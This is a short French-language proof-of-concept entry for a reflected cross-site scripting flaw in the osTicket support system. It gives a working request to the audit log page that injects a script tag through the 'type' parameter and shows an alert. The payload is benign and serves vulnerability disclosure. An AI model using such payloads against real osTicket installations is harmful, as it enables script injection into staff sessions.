
Exploit de preuve de concept XSS réfléchi pour le système de tickets de support osTicket, démontrant l'injection via les paramètres du journal d'audit.
XSS réfléchi
http://localhost/scp/audits.php?startData=&endDate=&type="><script>alert('reflectedXSS')</script>